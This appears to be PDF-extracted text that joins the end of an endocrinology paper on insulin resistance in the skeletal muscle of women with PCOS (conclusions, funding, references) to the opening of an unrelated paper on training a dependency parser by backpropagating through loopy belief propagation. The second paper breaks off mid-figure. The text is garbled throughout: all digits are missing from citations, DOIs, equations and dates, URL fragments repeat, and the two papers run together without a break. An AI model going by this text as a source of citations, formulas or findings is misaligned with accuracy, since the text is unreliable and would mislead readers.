attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n k stepto, d hiam et al. insulin resistance in pcos skeletal muscle pb–xx : particularly driving the synergy between obesity and pcos. intensified aerobic exercise training did not restore insulin sensitivity, despite improving insulin stimulated signalling at akt, as and mtor in overweight women with pcos. there was no clear evidence to support a role for hyperandrogenism in peripheral tissue insulin resistance, in women with pcos. overall, additional human research (in vivo and in vitro), supported by appropriate animals studies, is warranted to elucidate the role of androgens, mtor signalling, tgfβ ligand signalling networks and ecm deposition in pcos-specific insulin resistance. supplementary materials supplementary data has been deposited in a public data share repository and is available at: https://figshare.com/articles/supplementary_material_ molecular_mechanisms_of_insulin_resistance_in_skeletal_muscle_of_ women_with_pcos/ . declaration of interest n s, b s, b c and h t were awarded the nhmrc grant app ( – ), n s and r r were awarded an nhmrc grant app ( – ), d h an australia postgraduate scholarship. m g h and h t are nhmrc research fellows (app and app ). the other authors have nothing to disclose. funding the study was funded by the national health and medical research council of australia (nhmrc) project grant scheme grants app and app . author contribution statement n s and h t made substantial contributions to conception and design, acquisition of data, analysis and interpretation of data; drafting the article or revising it critically for important intellectual content; final approval of the version to be published. a j, a m a, b s, b c, c h, d h, m g h, n h, r r and s c made substantial contributions to acquisition of data, analysis and interpretation of data; drafting the article or revising it critically for important intellectual content; final approval of the version to be published. acknowledgements the authors wish to acknowledge the passing of their esteemed colleague and friend prof nigel stepto, february . the authors would like to thank profs james d cameron and juleen r zierath for their critical insights into study design and funding, prof will hopkins for mbi statistics and sas coding and dr rebecca goldstein for assistance during the trials. data sharing is available with de-identified raw data, statistical programs and analysis plans all available from authors on request. references bozdag g, mumusoglu s, zengin d, karabulut e & yildiz bo. the prevalence and phenotypic features of polycystic ovary syndrome: a systematic review and meta-analysis. human reproduction – . (https://doi.org/ . /humrep/dew ) moran lj, lombard cb, lim s, noakes m & teede hj. polycystic ovary syndrome and weight management. women’s health – . (https://doi.org/ . /whe. . ) kakoly ns, khomami mb, joham ae, cooray sd, misso ml, norman rj, harrison cl, ranasinha s, teede hj & moran lj. ethnicity, obesity and the prevalence of impaired glucose tolerance and type diabetes in pcos: a systematic review and meta- regression. human reproduction update – . (https://doi. org/ . /humupd/dmy ) lim ss, kakoly ns, tan jwj, fitzgerald g, khomami mb, joham ae, cooray sd, misso ml, norman rj, harrison cl, et al. metabolic syndrome in polycystic ovary syndrome: a systematic review, meta- analysis and meta-regression. obesity reviews – . (https://doi.org/ . /obr. ) teede hj, misso ml, deeks aa, moran lj, stuckey bga, wong jla, norman rj, costello mf & guideline development groups. assessment and management of polycystic ovary syndrome: summary of an evidence-based guideline. medical journal of australia s –s . (https://doi.org/ . /mja . ) teede hj, misso ml, costello mf, dokras a, laven j, moran l, piltonen t, norman rj & international pcos network. recommendations from the international evidence-based guideline for the assessment and management of polycystic ovary syndrome. clinical endocrinology – . (https://doi.org/ . /cen. ) cooney lg, lee i, sammel md & dokras a. high prevalence of moderate and severe depressive and anxiety symptoms in polycystic ovary syndrome: a systematic review and meta-analysis. human reproduction – . (https://doi.org/ . /humrep/ dex ) stepto nk, moreno-asso a, mcilvenna lc, walters ka & rodgers rj. molecular mechanisms of insulin resistance in polycystic ovary syndrome. unraveling the conundrum in skeletal muscle? journal of clinical endocrinology and metabolism – . (https:// doi.org/ . /jc. - ) stepto nk, cassar s, joham ae, hutchison sk, harrison cl, goldstein rf & teede hj. women with polycystic ovary syndrome have intrinsic insulin resistance on euglycaemic-hyperinsulaemic clamp. human reproduction – . (https://doi. org/ . /humrep/des ) cassar s, misso ml, hopkins wg, shaw cs, teede hj & stepto nk. insulin resistance in polycystic ovary syndrome: a systematic review and meta-analysis of euglycaemic-hyperinsulinaemic clamp studies. human reproduction – . (https://doi.org/ . / humrep/dew ) moran lj, misso ml, wild ra & norman rj. impaired glucose tolerance, type diabetes and metabolic syndrome in polycystic ovary syndrome: a systematic review and meta-analysis. human reproduction update – . (https://doi.org/ . / humupd/dmq ) rodgers rj, avery jc, moore vm, davies mj, azziz r, stener- victorin e, moran lj, robertson sa, stepto nk, norman rj, et al. complex diseases and co-morbidities: polycystic ovary syndrome and type diabetes mellitus. endocrine connections r –r . (https://doi.org/ . /ec- - ) diamanti-kandarakis e & dunaif a. insulin resistance and the polycystic ovary syndrome revisited: an update on mechanisms and implications. endocrine reviews – . (https://doi. org/ . /er. - ) legro rs, arslanian sa, ehrmann da, hoeger km, murad mh, pasquali r, welt ck & endocrine society. diagnosis and treatment of polycystic ovary syndrome: an endocrine society clinical practice guideline. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) stepto nk, patten r, tassone ec, misso ml, brennan l, boyle j, boyle ra, harrison cl, hirschberg al, marsh k, et al. exercise recommendations for women with polycystic ovary syndrome: is the this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://figshare.com/articles/supplementary_material_molecular_mechanisms_of_insulin_resistance_in_skeletal_muscle_of_women_with_pcos/ https://figshare.com/articles/supplementary_material_molecular_mechanisms_of_insulin_resistance_in_skeletal_muscle_of_women_with_pcos/ https://figshare.com/articles/supplementary_material_molecular_mechanisms_of_insulin_resistance_in_skeletal_muscle_of_women_with_pcos/ https://doi.org/ . /humrep/dew https://doi.org/ . /whe. . https://doi.org/ . /humupd/dmy https://doi.org/ . /humupd/dmy https://doi.org/ . /obr. https://doi.org/ . /mja . https://doi.org/ . /cen. https://doi.org/ . /humrep/dex https://doi.org/ . /humrep/dex https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /humrep/des https://doi.org/ . /humrep/des https://doi.org/ . /humrep/dew https://doi.org/ . /humrep/dew https://doi.org/ . /humupd/dmq https://doi.org/ . /humupd/dmq https://doi.org/ . /ec- - https://doi.org/ . /er. - https://doi.org/ . /er. - https://doi.org/ . /jc. - https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n k stepto, d hiam et al. insulin resistance in pcos skeletal muscle : evidence enough? sports medicine – . (https://doi. org/ . /s - - - ) lundsgaard am & kiens b. gender differences in skeletal muscle substrate metabolism – molecular mechanisms and insulin sensitivity. frontiers in endocrinology . (https://doi. org/ . /fendo. . ) krook a, bjornholm m, galuska d, jiang xj, fahlman r, myers jr mg, wallberg-henriksson h & zierath jr. characterization of signal transduction and glucose transport in skeletal muscle from type diabetic patients. diabetes – . (https://doi. org/ . /diabetes. . . ) krook a, roth ra, jiang xj, zierath jr & wallberg-henriksson h. insulin-stimulated akt kinase activity is reduced in skeletal muscle from niddm subjects. diabetes – . (https://doi. org/ . /diab. . . ) consitt la, van meter j, newton ca, collier dn, dar ms, wojtaszewski jfp, treebak jt, tanner cj & houmard ja. impairments in site-specific as phosphorylation and effects of exercise training. diabetes – . (https://doi.org/ . /db - ) hojlund k, glintborg d, andersen nr, birk jb, treebak jt, frosig c, beck-nielsen h & wojtaszewski jf. impaired insulin-stimulated phosphorylation of akt and as in skeletal muscle of women with polycystic ovary syndrome is reversed by pioglitazone treatment. diabetes – . (https://doi.org/ . /db - ) hansen sl, svendsen pf, jeppesen jf, hoeg ld, andersen nr, kristensen jm, nilas l, lundsgaard am, wojtaszewski jfp, madsbad s, et al. molecular mechanisms in skeletal muscle underlying insulin resistance in lean women with polycystic ovary syndrome. journal of clinical endocrinology and metabolism – . (https:// doi.org/ . /jc. - ) raja-khan n, urbanek m, rodgers rj & legro rs. the role of tgf- beta in polycystic ovary syndrome. reproductive sciences – . (https://doi.org/ . / ) böhm a, hoffmann c, irmler m, schneeweiss p, schnauder g, sailer c, schmid v, hudemann j, machann j, schick f, et al. tgf- β contributes to impaired exercise response by suppression of mitochondrial key regulators in skeletal muscle. diabetes – . (https://doi.org/ . /db - ) seong ha, manoharan r & ha h. smad proteins differentially regulate obesity-induced glucose and lipid abnormalities and inflammation via class-specific control of ampk-related kinase mpk /melk activity. cell death and disease . (https:// doi.org/ . /s - - -x) takahashi h, alves crr, stanford ki, middelbeek rjw, nigro p, ryan re, xue r, sakaguchi m, lynes md, so k, et al. tgf-β is an exercise-induced adipokine that regulates glucose and fatty acid metabolism. nature metabolism – . (https://doi. org/ . /s - - - ) richter ea & hargreaves m. exercise, glut , and skeletal muscle glucose uptake. physiological reviews – . (https://doi. org/ . /physrev. . ) harrison cl, lombard cb, strauss bj & teede hj. optimizing healthy gestational weight gain in women at high risk of gestational diabetes: a randomized controlled trial. obesity – . (https://doi. org/ . /oby. ) hutchison sk, stepto nk, harrison cl, moran lj, strauss bj & teede hj. effects of exercise on insulin resistance and body composition in overweight and obese women with and without polycystic ovary syndrome. journal of clinical endocrinology and metabolism e –e . (https://doi.org/ . /jc. - ) hutchison sk, teede hj, rachon d, harrison cl, strauss bj & stepto nk. effect of exercise training on insulin sensitivity, mitochondria and computed tomography muscle attenuation in overweight women with and without polycystic ovary syndrome. diabetologia – . (https://doi.org/ . /s - - - ) harrison cl, stepto nk, hutchison sk & teede hj. the impact of intensified exercise training on insulin resistance and fitness in overweight and obese women with and without polycystic ovary syndrome. clinical endocrinology – . (https://doi. org/ . /j. - . . .x) meyer c, mcgrath bp & teede hj. overweight women with polycystic ovary syndrome have evidence of subclinical cardiovascular disease. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) benziane b, burton tj, scanlan b, galuska d, canny bj, chibalin av, zierath jr & stepto nk. divergent cell signaling after short-term intensified endurance training in human skeletal muscle. american journal of physiology: endocrinology and metabolism e –e . (https://doi.org/ . /ajpendo. . ) parker l, stepto nk, shaw cs, serpiello fr, anderson m, hare dl & levinger i. acute high-intensity interval exercise-induced redox signaling is associated with enhanced insulin sensitivity in obese middle-aged men. frontiers in physiology . (https://doi. org/ . /fphys. . ) parker l, trewin a, levinger i, shaw cs & stepto nk. the effect of exercise-intensity on skeletal muscle stress kinase and insulin protein signaling. plos one e . (https://doi.org/ . / journal.pone. ) prodoehl mj, hatzirodos n, irving-rodgers hf, zhao zz, painter jn, hickey te, gibson ma, rainey we, carr br, mason hd, et al. genetic and gene expression analyses of the polycystic ovary syndrome candidate gene fibrillin- and other fibrillin family members in human ovaries. molecular human reproduction – . (https://doi.org/ . /molehr/gap ) hopkins wg, marshall sw, batterham am & hanin j. progressive statistics for studies in sports medicine and exercise science. medicine and science in sports and exercise – . (https://doi. org/ . /mss. b e cb ) corbould a, kim yb, youngren jf, pender c, kahn bb, lee a & dunaif a. insulin resistance in the skeletal muscle of women with polycystic ovary syndrome involves both intrinsic and acquired defects in insulin signaling. american journal of physiology: endocrinology and metabolism e –e . (https://doi. org/ . /ajpendo. . ) parker l, shaw cs, stepto nk & levinger i. exercise and glycemic control: focus on redox homeostasis and redox-sensitive protein signaling. frontiers in endocrinology . (https://doi. org/ . /fendo. . ) kleinert m, sylow l, fazakerley dj, krycer jr, thomas kc, oxboll aj, jordy ab, jensen te, yang g, schjerling p, et al. acute mtor inhibition induces insulin resistance and alters substrate utilization in vivo. molecular metabolism – . (https://doi. org/ . /j.molmet. . . ) bodine sc, stitt tn, gonzalez m, kline wo, stover gl, bauerlein r, zlotchenko e, scrimgeour a, lawrence jc, glass dj, et al. akt/mtor pathway is a crucial regulator of skeletal muscle hypertrophy and can prevent muscle atrophy in vivo. nature cell biology – . (https://doi.org/ . /ncb - ) dantas ws, marcondes ja, shinjo sk, perandini la, zambelli vo, neves wd, barcellos cr, rocha mp, yance v dos r, pereira rt, et al. glut translocation is not impaired after acute exercise in skeletal muscle of women with obesity and polycystic ovary syndrome. obesity – . (https://doi.org/ . /oby. ) peck gr, chavez ja, roach wg, budnik ba, lane ws, karlsson hk, zierath jr & lienhard ge. insulin-stimulated phosphorylation of the rab gtpase-activating protein tbc d regulates glut translocation. journal of biological chemistry – . (https://doi.org/ . /jbc.m . ) tonks kt, ng y, miller s, coster ac, samocha-bonet d, iseli tj, xu a, patrick e, yang jy, junutula jr, et al. impaired akt phosphorylation in insulin-resistant human muscle is accompanied by selective and this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /fendo. . https://doi.org/ . /fendo. . https://doi.org/ . /diabetes. . . https://doi.org/ . /diabetes. . . https://doi.org/ . /diab. . . https://doi.org/ . /diab. . . https://doi.org/ . /db - https://doi.org/ . /db - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . / https://doi.org/ . /db - https://doi.org/ . /s - - -x https://doi.org/ . /s - - -x https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /physrev. . https://doi.org/ . /physrev. . https://doi.org/ . /oby. https://doi.org/ . /oby. https://doi.org/ . /jc. - https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /j. - . . .x https://doi.org/ . /j. - . . .x https://doi.org/ . /jc. - https://doi.org/ . /ajpendo. . https://doi.org/ . /fphys. . https://doi.org/ . /fphys. . https://doi.org/ . /journal.pone. https://doi.org/ . /journal.pone. https://doi.org/ . /molehr/gap https://doi.org/ . /mss. b e cb https://doi.org/ . /mss. b e cb https://doi.org/ . /ajpendo. . https://doi.org/ . /ajpendo. . https://doi.org/ . /fendo. . https://doi.org/ . /fendo. . https://doi.org/ . /j.molmet. . . https://doi.org/ . /j.molmet. . . https://doi.org/ . /ncb - https://doi.org/ . /oby. https://doi.org/ . /jbc.m . https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n k stepto, d hiam et al. insulin resistance in pcos skeletal muscle pb–xx : heterogeneous downstream defects. diabetologia – . (https://doi.org/ . /s - - -y) newton ac. regulation of the abc kinases by phosphorylation: protein kinase c as a paradigm. biochemical journal – . (https://doi.org/ . /bj ) yu c, chen y, cline gw, zhang d, zong h, wang y, bergeron r, kim jk, cushman sw, cooney gj, et al. mechanism by which fatty acids inhibit insulin activation of insulin receptor substrate- (irs- )-associated phosphatidylinositol -kinase activity in muscle. journal of biological chemistry – . (https://doi. org/ . /jbc.m ) goto-inoue n, yamada k, inagaki a, furuichi y, ogino s, manabe y, setou m & fujii nl. lipidomics analysis revealed the phospholipid compositional changes in muscle by chronic exercise and high-fat diet. scientific reports . (https://doi.org/ . /srep ) cassar s, teede hj, moran lj, joham ae, harrison cl, strauss bj & stepto nk. polycystic ovary syndrome and anti-mullerian hormone: role of insulin resistance, androgens, obesity and gonadotrophins. clinical endocrinology – . (https://doi.org/ . / cen. ) tal r, seifer db, shohat-tal a, grazi rv & malter he. transforming growth factor-beta and its receptor soluble endoglin are altered in polycystic ovary syndrome during controlled ovarian stimulation. fertility and sterility – . (https://doi.org/ . /j. fertnstert. . . ) chen jl, colgan td, walton kl, gregorevic p & harrison ca. the tgf-β signalling network in muscle development, adaptation and disease. in growth factors and cytokines in skeletal muscle development, growth, regeneration and disease, pp. – . eds j white & g smythe. cham, switzerland: springer international publishing, . (https://doi.org/ . / - - - - _ ) cassar s, teede hj, harrison cl, joham ae, moran lj & stepto nk. biomarkers and insulin sensitivity in women with polycystic ovary syndrome: characteristics and predictive capacity. clinical endocrinology – . (https://doi.org/ . / cen. ) received in final form february accepted march accepted manuscript published online march this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /s - - -y https://doi.org/ . /bj https://doi.org/ . /jbc.m https://doi.org/ . /jbc.m https://doi.org/ . /srep https://doi.org/ . /cen. https://doi.org/ . /cen. https://doi.org/ . /j.fertnstert. . . https://doi.org/ . /j.fertnstert. . . https://doi.org/ . / - - - - _ https://doi.org/ . /cen. https://doi.org/ . /cen. https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com abstract introduction materials and methods participants study design exercise intervention clinical and biochemical measurements muscle protein extraction and western blot analyses rna extraction and tgfβ network/tissue fibrosis gene expression analysis statistical analysis results insulin signalling gene expression for tissue fibrosis impact of exercise discussion conclusions supplementary materials declaration of interest funding author contribution statement acknowledgements references approximation-aware dependency parsing by belief propagation matthew r. gormley mark dredze jason eisner human language technology center of excellence center for language and speech processing department of computer science johns hopkins university, baltimore, md {mrg,mdredze,jason}@cs.jhu.edu abstract we show how to train the fast dependency parser of smith and eisner ( ) for im- proved accuracy. this parser can consider higher-order interactions among edges while retaining o(n ) runtime. it outputs the parse with maximum expected recall—but for speed, this expectation is taken under a pos- terior distribution that is constructed only ap- proximately, using loopy belief propagation through structured factors. we show how to adjust the model parameters to compensate for the errors introduced by this approximation, by following the gradient of the actual loss on training data. we find this gradient by back- propagation. that is, we treat the entire parser (approximations and all) as a differentiable circuit, as others have done for loopy crfs (domke, ; stoyanov et al., ; domke, ; stoyanov and eisner, ). the re- sulting parser obtains higher accuracy with fewer iterations of belief propagation than one trained by conditional log-likelihood. introduction recent improvements to dependency parsing ac- curacy have been driven by higher-order features. such a feature can look beyond just the parent and child words connected by a single edge to also con- sider siblings, grandparents, etc. by including in- creasingly global information, these features pro- vide more information for the parser—but they also complicate inference. the resulting higher-order parsers depend on approximate inference and decod- ing procedures, which may prevent them from pre- dicting the best parse. for example, consider the dependency parser we will train in this paper, which is based on the work of smith and eisner ( ). ostensibly, this parser finds the minimum bayes risk (mbr) parse under a probability distribution defined by a higher-order dependency parsing model. in reality, it achieves o(n tmax) runtime by relying on three approxima- tions during inference: ( ) variational inference by loopy belief propagation (bp) on a factor graph, ( ) truncating inference after tmax iterations prior to convergence, and ( ) a first-order pruning model to limit the number of edges considered in the higher- order model. such parsers are traditionally trained as if the inference had been exact. in contrast, we train the parser such that the ap- proximate system performs well on the final eval- uation function. we treat the entire parsing com- putation as a differentiable circuit, and backprop- agate the evaluation function through our approx- imate inference and decoding methods to improve its parameters by gradient descent. the system also learns to cope with model misspecification, where the model couldn’t perfectly fit the distribution even absent the approximations. for standard graphical models, stoyanov and eisner ( ) call this ap- proach erma, for “empirical risk minimization un- der approximations.” for objectives besides empiri- cal risk, domke ( ) refers to it as “learning with truncated message passing.” our primary contribution is the application of this approximation-aware learning method in the pars- ing setting, for which the graphical model involves a global constraint. smith and eisner ( ) pre- viously showed how to run bp in this setting (by calling the inside-outside algorithm as a subroutine). we must backpropagate the downstream objective for perceptron training, utilizing inexact inference as a drop-in replacement for exact inference can badly mislead the learner (kulesza and pereira, ; huang et al., ). transactions of the association for computational linguistics, vol. , pp. – , . action editor: sebastian riedel. submission batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. function through their algorithm so that we can fol- low its gradient. we carefully define an empirical risk objective function (à la erma) to be smooth and differentiable, yet equivalent to accuracy of the minimum bayes risk (mbr) parse in the limit. find- ing this difficult to optimize, we introduce a new simpler objective function based on the l distance between the approximate marginals and the “true” marginals from the gold data. the goal of this work is to account for the approx- imations made by a system rooted in structured be- lief propagation. taking such approximations into account during training enables us to improve the speed and accuracy of inference at test time. we compare our training method with the standard ap- proach of conditional log-likelihood (cll) train- ing. we evaluate our parser on languages from the conll- (buchholz and marsi, ) and conll- (nivre et al., ) shared tasks as well as the english penn treebank (marcus et al., ). on english, the resulting parser obtains higher accuracy with fewer iterations of bp than cll. on the conll languages, we find that on av- erage it yields higher accuracy parsers than cll, particularly when limited to few bp iterations. dependency parsing by belief propagation this section describes the parser that we will train. model a factor graph (frey et al., ; kschis- chang et al., ) defines the factorization of a probability distribution over a set of variables {y ,y , . . .}. it is a bipartite graph between vari- ables yi and factors α. edges connect each factor α to a subset of the variables {yα ,yα , . . .}, called its neighbors. each factor defines a potential func- tion ψα, which assigns a nonnegative score to each configuration of its neighbors yα = {yα ,yα , . . .}. we define the probability of a given assignment y = {y ,y , . . .} to be proportional to the product of all factors’ potential functions: p(y) = z ∏ α ψα(yα). smith and eisner ( ) define a factor graph for dependency parsing of a given n-word sentence: n binary variables indicate which of the directed arcs are included (yi = on) or excluded (yi = off) in the dependency parse. one of the factors plays the role of a hard global constraint: ψptree(y) is juan su abdica reino $ y , y , y , y , y , y , y , y , y , y , y , y , y , y , y , y , figure : factor graph for dependency parsing of a - word sentence; $ is the root of the dependency graph. the boolean variable yh,m encodes whether the edge from parent h to child m is present. the unary factor (black) connected to this variable scores the edge in iso- lation (given the sentence). the ptree factor (red) coor- dinates all variables to ensure that the edges form a tree. the drawing shows a few higher-order factors (purple for grandparents, green for arbitrary siblings); these are re- sponsible for the graph being cyclic (“loopy”). or according to whether the assignment en- codes a projective dependency tree. another n fac- tors (one per variable) evaluate the individual arcs given the sentence, so that p(y) describes a first- order dependency parser. a higher-order parsing model is achieved by also including higher-order factors, each scoring configurations of two or more arcs, such as grandparent and sibling configurations. higher-order factors tend to create cycles in the fac- tor graph. see figure for an example factor graph. we define each potential function to have a log- linear form: ψα(yα) = exp(θ ·fα(yα,x)). here x is the assignment to the observed variables such as the sentence and its pos tags; fα extracts a vector of features; and θ is our vector of model parameters. we write the resulting probability distribution over parses as pθ(y |x), to indicate that it depends on θ. loss for dependency parsing, our loss function is the number of missing edges in the predicted parse ŷ, relative to the reference (or “gold”) parse y∗: `(ŷ,y∗) = ∑ i: ŷi=off i(y∗i = on) ( ) i is the indicator function. because ŷ and y∗ each specify exactly one parent per word token, `(ŷ,y∗) equals the directed dependency error: the number of word tokens whose parent is predicted incorrectly. decoder to obtain a single parse as output, we use a minimum bayes risk (mbr) decoder, which returns the tree with minimum expected loss under the model’s distribution (bickel and doksum, ; goodman, ). our ` gives the decision rule: hθ(x) = argmin ŷ ey∼pθ(· |x)[`(ŷ,y)] ( ) = argmax ŷ ∑ i: ŷi=on pθ(yi = on |x) ( ) here ŷ ranges over well-formed parses. thus, our parser seeks a well-formed parse hθ(x) whose in- dividual edges have a high probability of being cor- rect according to pθ (since it lacks knowledge y∗ of which edges are truly correct). mbr is the prin- cipled way to take a loss function into account un- der a probabilistic model. by contrast, maximum a posteriori (map) decoding does not consider the loss function. it would return the single highest- probability parse even if that parse, and its individual edges, were unlikely to be correct. all systems in this paper use mbr decoding to consider the loss function at test time. this implies that the ideal training procedure would be to find the true pθ so that its marginals can be used in ( ). our baseline system attempts this. yet in practice, we will not be able to find the true pθ (model misspec- ification) nor exactly compute the marginals of pθ (computational intractability). thus, this paper pro- poses a training procedure that compensates for the system’s approximations, adjusting θ to reduce the actual loss of hθ(x) as measured at training time. to find the mbr parse, we first run inference to compute the marginal probability pθ(yi = on |x) for each edge. then we maximize ( ) by running a first-order dependency parser with edge scores equal to those probabilities. when our inference algo- rithm is approximate, we replace the exact marginal with its approximation—the belief from bp, given by bi(on) in ( ) below. inference loopy belief propagation (bp) (murphy et al., ) computes ap- proximations to the variable marginals if we used a simple - loss function within ( ), then mbr decoding would reduce to map decoding. prior work (smith and eisner, ; bansal et al., ) used the log-odds ratio log pθ(yi=on) pθ(yi=off) as the edge scores for decoding, but this yields a parse different from the mbr parse. pθ(yi |x) = ∑ y′:y′i=yi pθ(y ′ |x), as needed by ( ), as well as the factor marginals pθ(yα |x) = ∑ y′:y′α=yα pθ(y ′ |x). the algo- rithm proceeds by iteratively sending messages from variables, yi, to factors, α: m (t) i→α(yi) ∝ ∏ β∈n(i)\α m (t− ) β→i (yi) ( ) and from factors to variables: m (t) α→i(yi) ∝ ∑ yα∼yi ψα(yα) ∏ j∈n(α)\i m (t− ) j→α (yi) ( ) where n(i) and n(α) denote the neighbors of yi and α respectively, and where yα ∼ yi is standard notation to indicate that yα ranges over all assign- ments to the variables participating in the factor α provided that the ith variable has value yi. note that the messages at time t are computed from those at time (t− ). messages at the final time tmax are used to compute the beliefs at each factor and variable: bi(yi) ∝ ∏ α∈n(i) m (tmax) α→i (yi) ( ) bα(yα) ∝ ψα(yα) ∏ i∈n(α) m (tmax) i→α (yi) ( ) we assume each of the messages and beliefs given in ( )–( ) are scaled to sum-to-one. for example, bi is normalized such that ∑ yi bi(yi) = and ap- proximates the marginal distribution over yi values. messages continue to change indefinitely if the fac- tor graph is cyclic, but in the limit, the messages may converge. although the equations above update all messages in parallel, convergence is much faster if only one message is updated per timestep, in some well-chosen serial order. for the ptree factor, the summation over vari- able assignments required for m(t)α→i(yi) in eq. ( ) equates to a summation over exponentially many projective parse trees. however, we can use an inside-outside variant of eisner ( )’s algorithm following dreyer and eisner ( , footnote ), we choose an arbitrary directed spanning tree of the factor graph rooted at the ptree factor. we visit the nodes in topologically sorted order (from leaves to root) and update any message from the node being visited to a node that is later in the order. we then reverse this order and repeat, so that every message has been passed once. this constitutes one iteration of bp. to compute this in polynomial time (we describe this as hypergraph parsing in § ). the resulting “struc- tured bp” inference procedure—detailed by smith and eisner ( )—is exact for first-order depen- dency parsing. when higher-order factors are incor- porated, it is approximate but remains fast, whereas exact inference would be slow. approximation-aware learning we aim to find the parameters θ∗ that minimize a regularized objective function over the training sam- ple of (sentence, parse) pairs {(x(d),y(d))}dd= . θ∗ = argmin θ d (( d∑ d= j(θ;x(d),y(d)) ) + λ ||θ|| ) ( ) where λ > is the regularization coefficient and j(θ;x,y∗) is a given differentiable function, pos- sibly nonconvex. we locally minimize this objec- tive using ` -regularized adagrad with composite mirror descent (duchi et al., )—a variant of stochastic gradient descent that uses mini-batches, an adaptive learning rate per dimension, and sparse lazy updates from the regularizer. objective functions the standard choice for j is the negative conditional log-likelihood (§ ). how- ever, as in stoyanov et al. ( ), our aim is to mini- mize expected loss on the true data distribution over sentence/parse pairs (x,y ): θ∗ = argminθ e[`(hθ(x),y )] ( ) since the true data distribution is unknown, we sub- stitute the expected loss over the training sample, and regularize our objective in order to reduce sam- pling variance. specifically, we aim to minimize the regularized empirical risk, given by ( ) with j(θ;x(d),y(d)) set to `(hθ(x(d)),y(d)). note that how slow is exact inference for dependency parsing? for certain choices of higher-order factors, polynomial time is pos- sible via dynamic programming (mcdonald et al., ; car- reras, ; koo and collins, ). however, bp will typically be asymptotically faster (for a fixed number of iterations) and faster in practice. in some other settings, exact inference is np- hard. in particular, non-projective parsing becomes np-hard with even second-order factors (mcdonald and pereira, ). bp can handle this case in polynomial time by replacing the ptree factor with a tree factor that allows edges to cross. θ is initialized to when not otherwise specified. this loss function would not be differentiable—a key issue we will take up below. this is the “erma” method of stoyanov and eisner ( ). we will also consider simpler choices of j—akin to the loss func- tions used by domke ( ). gradient computation to compute the gradi- ent ∇θj(θ;x,y∗) of the loss on a single sentence (x,y∗) = (x(d),y(d)), we apply automatic differ- entiation (ad) in the reverse mode (griewank and corliss, ). this yields the same type of “back- propagation” algorithm that has long been used for training neural networks (rumelhart et al., ). it is important to note that the resulting gradient com- putation algorithm is exact up to floating-point er- ror, and has the same asymptotic complexity as the original decoding algorithm, requiring only about twice the computation. the ad method applies pro- vided that the original function is indeed differen- tiable with respect to θ. in principle, it is possi- ble to compute the gradient with minimal additional coding. there exists ad software (some listed at autodiff.org) that could be used to derive the necessary code automatically. another option would be to use the perturbation method of domke ( ). however, we implemented the gradient computation directly, and we describe it here. inference, decoding, and loss as a feedfoward circuit the backpropagation algorithm is often applied to neural networks, where the topology of a feedforward circuit is statically specified and can be applied to any input. our bp algorithm, decoder, and loss function similarly define a feedfoward cir- cuit that computes our function j. the circuit’s depth depends on the number of bp timesteps, tmax. its topology is defined dynamically (per sentence x(d)) by “unrolling” the computation into a graph. figure shows this topology. the high level modules consist of (a) computing potential func- tions, (b) initializing messages, (c) sending mes- sages, (d) computing beliefs, and (e) decoding and computing the loss. we zoom in on two submodules: the first computes messages from the ptree factor efficiently (c. –c. ); the second computes a soft- ened version of our loss function (e. –e. ). both of these submodules are made efficient by the inside- outside algorithm. the next two sections describe in greater detail autodiff.org how we define the function j (the forward pass) and how we compute its gradient (the backward pass). backpropagation through the circuit from figure poses several challenges. eaton and ghahramani ( ), stoyanov et al. ( ), and domke ( ) showed how to backpropagate through the basic bp algorithm, and we reiterate the key details below (§ . ). the remaining challenges form the primary technical contribution of this paper: . our true loss function `(hθ(x),y∗) by way of the decoder hθ contains an argmax ( ) over trees and is therefore not differentiable. we show how to soften this decoder (by substitut- ing a softmax), making it differentiable (§ . ). . empirically, we find the above objective diffi- cult to optimize. to address this, we substitute a simpler l loss function (commonly used in neural networks). this is easier to optimize and yields our best parsers in practice (§ . ). . we show how to run backprop through the inside-outside algorithm on a hypergraph (§ . ) for use in two modules: the softened decoder (§ . ) and computation of messages from the ptree factor (§ . ). this allows us to go be- yond stoyanov et al. ( ) and train struc- tured bp in an approximation-aware and loss- aware fashion. differentiable objective functions . annealed risk minimizing the test-time loss is the appropriate goal for training an approximate system like ours. that loss is estimated by the empirical risk on a large amount of in-domain supervised training data. alas, this risk is nonconvex and piecewise con- stant, so we turn to deterministic annealing (smith and eisner, ) and clever initialization. directed dependency error, `(hθ(x),y∗), is not differentiable due to the argmax in the decoder hθ. so we redefine j(θ;x,y∗) to be a new differentiable loss function, the annealed risk r /tθ (x,y ∗), which approaches the loss `(hθ(x),y∗) as the temperature t → . our first step is to define a distribution over parses, which takes the marginals pθ(yi = on |x) as input, or in practice, their bp approximations bi(on): q /t θ (ŷ |x) ∝ exp (∑ i:ŷi=on pθ(yi=on |x) t ) ( ) (e) decode and loss j(θ;x,y∗) = (e. ) expected recall (e. ) inside-outside (e. ) anneal beliefs (d) beliefs bi(yi) = . . ., bα(yα) = . . . (c) 